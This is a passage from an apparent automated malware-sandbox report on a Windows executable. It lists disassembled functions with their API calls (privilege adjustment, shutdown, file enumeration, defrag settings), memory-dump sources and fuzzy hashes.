                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                    • Opcode ID: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                    • Instruction ID: 01dd7cb33c618876df907d584398aa6540e784f12a7d1eb18dd06df18f62a64b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB516171204341AFE324DB21CD45FAF77E8AB88B04F10891EF54D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                    Function 00419D90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,00421955), ref: 00419D9A
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00421955), ref: 00419DA1
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00419DB7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00421955), ref: 00419DC6
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00419E04
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E13
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E24
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 1280518032-3733053543
                                                                                                                                                                                                                                                                                    • Opcode ID: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                    • Instruction ID: d07024e087d9fbb4da489035f39631b0ffcbbc48e9dced30be6a628d6d85d024
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D91130B5208300ABD314DFA4DC89B5B77E4BB88B00F80882CF54DC6290E778D8C48B5A
                                                                                                                                                                                                                                                                                    Function 0041F8D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 0041F916
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000027,?,00000000), ref: 0041F937
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041F945
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041F94B
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041F958
                                                                                                                                                                                                                                                                                    • DrawIcon.USER32(?,?,?,?), ref: 0041F989
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 2166663075-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction ID: c07e6ffc6c3a7e6482c06200d306031f545548e1037b46c62c472d77c4aae73d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE3158712086019FD324DF38C989BABB7E8FB88710F144A2EE19A93290DB74E845CB55
                                                                                                                                                                                                                                                                                    Function 0041E0F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49shutdownCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041E14E
                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                    • Opcode ID: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction ID: ff8bdaaac48f1339d689247c0ac3bb4d0c15d19762690cb1fcb66aa4c131ddab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301FC35644310BFE3109BA8DC49B9B7698BB44B04F40482DFD4DE6191D77499408BDA
                                                                                                                                                                                                                                                                                    Function 0045A7D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeSpace$Find$CloseFileFirst
                                                                                                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                                                                                                    • API String ID: 281833627-3142399695
                                                                                                                                                                                                                                                                                    • Opcode ID: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction ID: 5c1349d2b4a299dbbed6192556f5b370b8187b703f81d55d5c722b9a40b8fb44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A071FBB55057019FD314DF64D988BABB7E4FF98711F008A2EE89A87390E734A848CF56
                                                                                                                                                                                                                                                                                    Function 00419CF0 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020028,?), ref: 00419CFD
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00419D04
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00419D1E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3639550587-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction ID: f3d016862a4d3342d6fd7035e13c423cea38e9027ddeccfb2464269e0ea5178e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73015275644301AFE314CFA5DC89B6BB7E8FB88B05F80492CF54DC2290E774D9848B56
                                                                                                                                                                                                                                                                                    Function 004631F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0046342D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                    • String ID: %s%s\$%s*
                                                                                                                                                                                                                                                                                    • API String ID: 3541575487-790581550
                                                                                                                                                                                                                                                                                    • Opcode ID: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction ID: c3493345b0c0ceefe68b50463acd725d1f8c1e028979316797af0ed8e7acec35
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC71B5711083809FC720EF64C884A6BB7E5FB89314F444A6EF85997391E734EA45CB57
                                                                                                                                                                                                                                                                                    Function 004734E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00473B49
                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00473B8C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                    Function 00609277 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                    • Instruction ID: 7f45a62b763b18ee1db0e3ef6cde993bceb0ffd0ff8c50725b501db6588a7515
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06275A50200EFC718DF0AC544CD677F7EB857107654595D4049B3A2D3B0DE45CB70
                                                                                                                                                                                                                                                                                    Function 00428720 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401099,0047D9D0,0047D9D0,0047D9D0,0047D9D0,00000000), ref: 00428778
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401128,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287AA
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401127,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287D6
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401032,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428811
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401033,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 0042883D
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401086,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428869
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(10021,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004288A4
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
